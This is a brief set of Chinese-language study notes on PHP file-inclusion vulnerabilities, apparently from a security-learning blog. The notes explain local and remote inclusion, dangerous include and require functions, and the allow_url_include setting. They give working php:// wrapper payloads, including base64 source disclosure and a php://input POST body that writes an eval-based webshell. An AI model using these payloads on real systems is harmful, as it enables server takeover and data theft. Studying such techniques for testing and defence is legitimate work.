文件操作之文件包含
判断Windows和linux 大小写,eg index.phP 报错即为linux
文件包含分为本地包含和远程包含
文件包含在 php 中,涉及到的危险函数有四个,分别是include()、include_once()、require()、require_once()。
include函数会把包含的txt文本中的内容当做php代码执行
类型远程包含:在代码中设置,allow-url-include 为 on,则可以远程包含,在 phpinfo
如果包含的文件不再目录下用../返回上一级.
php伪协议
如果 PHP 的配置选项 allow_url_include、allow_url_fopen 状态为 ON 的话,
则include/require 函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞php://filter/read=convert.base64-encode/resource=[文件名]
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
php://input?test=php://input 【post data】
浙公网安备 33010602011771号